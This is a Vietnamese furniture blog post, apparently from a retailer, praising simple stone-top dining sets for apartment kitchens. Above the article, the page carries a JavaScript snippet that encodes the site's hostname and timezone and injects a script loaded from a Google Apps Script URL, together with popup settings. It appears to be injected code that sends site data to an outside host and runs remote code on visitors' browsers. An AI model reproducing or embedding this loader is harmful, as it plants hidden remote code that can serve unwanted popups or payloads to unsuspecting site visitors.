var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

5 bộ bàn ghế ăn đơn giản vẫn cực sang cho nhà bếp chung cư

Nhà bếp chung cư chọn bộ bàn ghế ăn đơn giản trong thiết kế sẽ rất phù hợp. Thiết kế bàn ghế ăn đơn giản nhưng lại rất tinh tế, rất sang trọng và đẳng cấp. Chính vì vậy dòng sản phẩm này luôn nhận được sự chú ý của mọi người.

5 bộ bàn ghế ăn thiết kế đơn giản sau đây mà Nội Thất Xinh giới thiệu đó là bàn ăn mặt đá với kiểu dáng hiện đại. Chúng khi sử dụng trong chung cư hiện đại tạo vẻ đẹp thời thượng nhất cùng giá trị thẩm mĩ cao nhất.

5 bộ bàn ghế ăn đơn giản vẫn cực sang cho nhà bếp chung cư

bộ bàn ghế ăn đơn giản
Nhà bếp chung cư sẽ rất ấn tượng với mẫu bàn ăn mặt đá này. Bàn ghế ăn vô cùng sang trọng nhờ chất liệu cũng như các đường nét thiết kế

bộ bàn ghế ăn đơn giản

Vẫn là mẫu bàn ghế ăn đơn giản mặt đá cao cấp, gam màu trắng xám kết hợp tạo nên sự thanh lịch nhất

bộ bàn ghế ăn đơn giản

Bàn ăn đá cùng ghế ăn bằng da cao cấp mang phong cách hiện đại cho nhà bếp chung cư 

bộ bàn ghế ăn đơn giản

Bàn ăn mặt đá màu xám thanh lịch, sang trọng, đơn giản và tinh tế. Màu sắc bàn ghế ăn có thể kết hợp với nhiều món đồ trong nhà bếp chung cư của bạn

bộ bàn ghế ăn đơn giản

Từng đường nét của bạn ghế ăn đều rất mạnh mẽ, hiện đại và không có bất cứ lỗi kĩ thuật nào

Các mẫu bàn ghế ăn này dùng trong không gian nhà bếp chung cư cùng với thảm sofa sẽ rất hợp. Hai món đồ nội thất này kết hợp hoàn hảo nên đang ngày càng được yêu thích hơn bao giờ hết.

Xu hướng chọn bộ bàn ghế ăn đơn giản cho nhà bếp

Thiết kế không gian nhà bếp theo phong cách hiện đại đang trở nên ưa chuộng hiện nay. Và trong không gian này chọn lựa bàn ghế ăn đơn giản sẽ rất thích hợp. Sự đơn giản, không cầu kì uốn lượn nhưng từng đường nét rất tinh tế và toát ngay được sự thời thượng chính là điểm nhấn của dòng sản phẩm này.

Bàn ăn đẹp thiết kế đơn giản mang phong cách của sự nhẹ nhàng nhưng đầy cuốn hút, chúng cũng cực kì tiện nghi khi sử dụng. Bàn ghế ăn dễ dàng bố trí trong không gian, tiện lợi khi ngồi và dùng bữa.

Mua các mẫu bàn ăn đơn giản mặt đá hoặc các chất liệu khác với vẻ đẹp sang trọng, hiện đại, chất lượng cao cấp thì Nội Thất Xinh chính là địa chỉ tin cậy bạn không thể bỏ qua.

=> Tham khảo:  Top 3 mẫu bàn ghế ăn hình tròn cho ngày tết thêm đầm ấm